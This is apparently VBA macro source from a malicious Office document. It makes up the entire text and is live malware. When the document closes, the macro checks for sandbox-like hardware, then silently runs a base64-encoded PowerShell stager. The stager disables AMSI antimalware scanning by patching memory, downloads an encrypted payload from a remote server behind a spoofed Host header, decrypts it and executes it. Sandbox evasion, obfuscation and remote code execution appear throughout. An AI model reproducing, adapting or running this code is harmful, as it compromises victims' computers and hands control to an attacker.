Sub AutoClose()
	jpSxvNvfXjZVxieOesE
End Sub

Public Function jpSxvNvfXjZVxieOesE() As Variant
	strComputer = "."
	Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
	Set ID = objWMIService.ExecQuery("Select IdentifyingNumber from Win32_ComputerSystemproduct")
	For Each objItem In ID
		If StrComp(objItem.IdentifyingNumber, "2UA20511KN") = 0 Then End
	Next
	Set disksize = objWMIService.ExecQuery("Select Size from Win32_logicaldisk")
	For Each objItem In disksize
		If (objItem.Size = 42949603328#) Then End
		If (objItem.Size = 68719443968#) Then End
	Next
	Dim zGdodc As String
	zGdodc = "powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVg"
	zGdodc = zGdodc + "BlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBp"
	zGdodc = zGdodc + "AG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABNAG"
	zGdodc = zGdodc + "UAdABoAG8AZABEAGUAZgBpAG4AaQB0AGkAbwBuACAAPQAgACIA"
	zGdodc = zGdodc + "WwBEAGwAbABJAG0AcABvAHIAdAAoAGAAIgBrAGUAcgBuAGUAbA"
	zGdodc = zGdodc + "AzADIAYAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBj"
	zGdodc = zGdodc + "ACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AF"
	zGdodc = zGdodc + "AAcgBvAGMAQQBkAGQAcgBlAHMAcwAoAEkAbgB0AFAAdAByACAA"
	zGdodc = zGdodc + "aABNAG8AZAB1AGwAZQAsACAAcwB0AHIAaQBuAGcAIABwAHIAbw"
	zGdodc = zGdodc + "BjAE4AYQBtAGUAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKABg"
	zGdodc = zGdodc + "ACIAawBlAHIAbgBlAGwAMwAyAGAAIgApAF0AcAB1AGIAbABpAG"
	zGdodc = zGdodc + "MAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQA"
	zGdodc = zGdodc + "UAB0AHIAIABHAGUAdABNAG8AZAB1AGwAZQBIAGEAbgBkAGwAZQ"
	zGdodc = zGdodc + "AoAHMAdAByAGkAbgBnACAAbABwAE0AbwBkAHUAbABlAE4AYQBt"
	zGdodc = zGdodc + "AGUAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKABgACIAawBlAH"
	zGdodc = zGdodc + "IAbgBlAGwAMwAyAGAAIgApAF0AcAB1AGIAbABpAGMAIABzAHQA"
	zGdodc = zGdodc + "YQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAFYAaQ"
	zGdodc = zGdodc + "ByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoAEkAbgB0AFAAdABy"
	zGdodc = zGdodc + "ACAAbABwAEEAZABkAHIAZQBzAHMALAAgAFUASQBuAHQAUAB0AH"
	zGdodc = zGdodc + "IAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUA"
	zGdodc = zGdodc + "dwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIA"
	zGdodc = zGdodc + "BsAHAAZgBsAE8AbABkAFAAcgBvAHQAZQBjAHQAKQA7ACIAOwAk"
	zGdodc = zGdodc + "AEsAZQByAG4AZQBsADMAMgAgAD0AIABBAGQAZAAtAFQAeQBwAG"
	zGdodc = zGdodc + "UAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4A"
	zGdodc = zGdodc + "IAAkAE0AZQB0AGgAbwBkAEQAZQBmAGkAbgBpAHQAaQBvAG4AIA"
	zGdodc = zGdodc + "AtAE4AYQBtAGUAIAAnAEsAZQByAG4AZQBsADMAMgAnACAALQBO"
	zGdodc = zGdodc + "AGEAbQBlAFMAcABhAGMAZQAgACcAVwBpAG4AMwAyACcAIAAtAF"
	zGdodc = zGdodc + "AAYQBzAHMAVABoAHIAdQA7ACQAQQBCAFMARAAgAD0AIAAnAEEA"
	zGdodc = zGdodc + "bQBzAGkAUwAnACsAJwBjAGEAbgBCAHUAZgBmAGUAcgAnADsAJA"
	zGdodc = zGdodc + "BoAGEAbgBkAGwAZQAgAD0AIABbAFcAaQBuADMAMgAuAEsAZQBy"
	zGdodc = zGdodc + "AG4AZQBsADMAMgBdADoAOgBHAGUAdABNAG8AZAB1AGwAZQBIAG"
	zGdodc = zGdodc + "EAbgBkAGwAZQAoACcAYQBtAHMAaQAuAGQAbABsACcAKQA7AFsA"
	zGdodc = zGdodc + "SQBuAHQAUAB0AHIAXQAkAEIAdQBmAGYAZQByAEEAZABkAHIAZQ"
	zGdodc = zGdodc + "BzAHMAIAA9ACAAWwBXAGkAbgAzADIALgBLAGUAcgBuAGUAbAAz"
	zGdodc = zGdodc + "ADIAXQA6ADoARwBlAHQAUAByAG8AYwBBAGQAZAByAGUAcwBzAC"
	zGdodc = zGdodc + "gAJABoAGEAbgBkAGwAZQAsACAAJABBAEIAUwBEACkAOwBbAFUA"
	zGdodc = zGdodc + "SQBuAHQAMwAyAF0AJABTAGkAegBlACAAPQAgADAAeAA1ADsAWw"
	zGdodc = zGdodc + "BVAEkAbgB0ADMAMgBdACQAUAByAG8AdABlAGMAdABGAGwAYQBn"
	zGdodc = zGdodc + "ACAAPQAgADAAeAA0ADAAOwBbAFUASQBuAHQAMwAyAF0AJABPAG"
	zGdodc = zGdodc + "wAZABQAHIAbwB0AGUAYwB0AEYAbABhAGcAIAA9ACAAMAA7AFsA"
	zGdodc = zGdodc + "VwBpAG4AMwAyAC4ASwBlAHIAbgBlAGwAMwAyAF0AOgA6AFYAaQ"
	zGdodc = zGdodc + "ByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoACQAQgB1AGYAZgBl"
	zGdodc = zGdodc + "AHIAQQBkAGQAcgBlAHMAcwAsACAAJABTAGkAegBlACwAIAAkAF"
	zGdodc = zGdodc + "AAcgBvAHQAZQBjAHQARgBsAGEAZwAsACAAWwBSAGUAZgBdACQA"
	zGdodc = zGdodc + "TwBsAGQAUAByAG8AdABlAGMAdABGAGwAYQBnACkAOwAkAGIAdQ"
	zGdodc = zGdodc + "BmACAAPQAgAFsAQgB5AHQAZQBbAF0AXQAoAFsAVQBJAG4AdAAz"
	zGdodc = zGdodc + "ADIAXQAwAHgAQgA4ACwAWwBVAEkAbgB0ADMAMgBdADAAeAA1AD"
	zGdodc = zGdodc + "cALAAgAFsAVQBJAG4AdAAzADIAXQAwAHgAMAAwACwAIABbAFUA"
	zGdodc = zGdodc + "aQBuAHQAMwAyAF0AMAB4ADAANwAsACAAWwBVAGkAbgB0ADMAMg"
	zGdodc = zGdodc + "BdADAAeAA4ADAALAAgAFsAVQBpAG4AdAAzADIAXQAwAHgAQwAz"
	zGdodc = zGdodc + "ACkAOwBbAHMAeQBzAHQAZQBtAC4AcgB1AG4AdABpAG0AZQAuAG"
	zGdodc = zGdodc + "kAbgB0AGUAcgBvAHAAcwBlAHIAdgBpAGMAZQBzAC4AbQBhAHIA"
	zGdodc = zGdodc + "cwBoAGEAbABdADoAOgBjAG8AcAB5ACgAJABiAHUAZgAsACAAMA"
	zGdodc = zGdodc + "AsACAAJABCAHUAZgBmAGUAcgBBAGQAZAByAGUAcwBzACwAIAA2"
	zGdodc = zGdodc + "ACkAOwB9ADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAH"
	zGdodc = zGdodc + "IAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoA"
	zGdodc = zGdodc + "OgBFAHgAcABlAGMAdAAxADAAMABDAG8AbgB0AGkAbgB1AGUAPQ"
	zGdodc = zGdodc + "AwADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBF"
	zGdodc = zGdodc + "AG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAH"
	zGdodc = zGdodc + "QAQgB5AHQAZQBzACgAJwBJAHYAVgBeAFkAOgBGAHQAZgBDAFgA"
	zGdodc = zGdodc + "VAAsAD0AYQBBAE0APwBqACMANwBPAFEAcABdACYAcgB8AFsAWg"
	zGdodc = zGdodc + "B4AG4AJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBn"
	zGdodc = zGdodc + "AHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AH"
	zGdodc = zGdodc + "wAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsA"
	zGdodc = zGdodc + "WwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOw"
	zGdodc = zGdodc + "AkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABK"
	zGdodc = zGdodc + "AF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9AC"
	zGdodc = zGdodc + "gAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQA"
	zGdodc = zGdodc + "UwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJA"
	zGdodc = zGdodc + "BTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBd"
	zGdodc = zGdodc + "ADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdAC"
	zGdodc = zGdodc + "sAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMA"
	zGdodc = zGdodc + "PQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALg"
	zGdodc = zGdodc + "BOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABzAGUAcgA9"
	zGdodc = zGdodc + "ACQAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6AD"
	zGdodc = zGdodc + "oAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgA"
	zGdodc = zGdodc + "WwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQ"
	zGdodc = zGdodc + "A2ADQAUwB0AHIAaQBuAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBj"
	zGdodc = zGdodc + "AEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAH"
	zGdodc = zGdodc + "UAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATQBnAEEAeABBAEMA"
	zGdodc = zGdodc + "NABBAE0AUQBBAHkAQQBEAGcAQQBPAGcAQQA0AEEARABBAEEAJw"
	zGdodc = zGdodc + "ApACkAKQA7ACQAdAA9ACcALwB3AHAALQBjAG8AbgB0AGUAbgB0"
	zGdodc = zGdodc + "AC8AdABoAGUAbQBlAHMALwB3AHAAXwBkAGEAdABhAC4AcABoAH"
	zGdodc = zGdodc + "AAJwA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUA"
	zGdodc = zGdodc + "bQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOg"
	zGdodc = zGdodc + "BEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBj"
	zGdodc = zGdodc + "AC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAC"
	zGdodc = zGdodc + "AAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQA"
	zGdodc = zGdodc + "ZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQ"
	zGdodc = zGdodc + "BsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBs"
	zGdodc = zGdodc + "AHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgAC"
	zGdodc = zGdodc + "QAdwBjAC4AUAByAG8AeAB5ADsAJAB3AGMALgBIAGUAYQBkAGUA"
	zGdodc = zGdodc + "cgBzAC4AQQBkAGQAKAAiAFUAcwBlAHIALQBBAGcAZQBuAHQAIg"
	zGdodc = zGdodc + "AsACIATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBk"
	zGdodc = zGdodc + "AG8AdwBzACAATgBUACAANgAuADMAOwAgAFcAaQBuADYANAA7AC"
	zGdodc = zGdodc + "AAeAA2ADQAKQAgAEEAcABwAGwAZQBXAGUAYgBLAGkAdAAvADUA"
	zGdodc = zGdodc + "MwA3AC4AMwA2ACAAKABLAEgAVABNAEwALAAgAGwAaQBrAGUAIA"
	zGdodc = zGdodc + "BHAGUAYwBrAG8AKQAgAEMAaAByAG8AbQBlAC8ANwA5AC4AMAAu"
	zGdodc = zGdodc + "ADMAOQA0ADUALgA4ADgAIABTAGEAZgBhAHIAaQAvADUAMwA3AC"
	zGdodc = zGdodc + "4AMwA2ACIAKQA7AHQAcgB5AHsAJABpAGcAPQAkAHcAYwAuAEQA"
	zGdodc = zGdodc + "bwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgApAH0AYw"
	zGdodc = zGdodc + "BhAHQAYwBoAHsAfQA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAu"
	zGdodc = zGdodc + "AEEAZABkACgAIgBIAG8AcwB0ACIALAAiAHcAbQB3AGkAZgBiAG"
	zGdodc = zGdodc + "EAagB4AHgAYgBjAHgAbQB1AGMAeABtAGwAYwAuAGMAbwBtACIA"
	zGdodc = zGdodc + "KQA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIg"
	zGdodc = zGdodc + "BDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AOABm"
	zGdodc = zGdodc + "AEIAbwA3AEIASwBiAGMAVABEAGEAUgBhADAAUwA0AFIAVgBDAH"
	zGdodc = zGdodc + "oAegBZAE4AQgBNAEEAJQAzAEQAIgApADsAJABkAGEAdABhAD0A"
	zGdodc = zGdodc + "JAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcw"
	zGdodc = zGdodc + "BlAHIAKwAkAHQAKQA7ACQAaQB2AD0AJABkAGEAdABhAFsAMAAu"
	zGdodc = zGdodc + "AC4AMwBdADsAJABkAGEAdABhAD0AJABkAGEAdABhAFsANAAuAC"
	zGdodc = zGdodc + "4AKAAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaAAtADEAKQBdADsA"
	zGdodc = zGdodc + "LQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIA"
	zGdodc = zGdodc + "AkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBY"
	zGdodc = zGdodc + "AA=="
	Set asd = CreateObject("WScript.Shell")
	asd.Run(zGdodc)
End Function
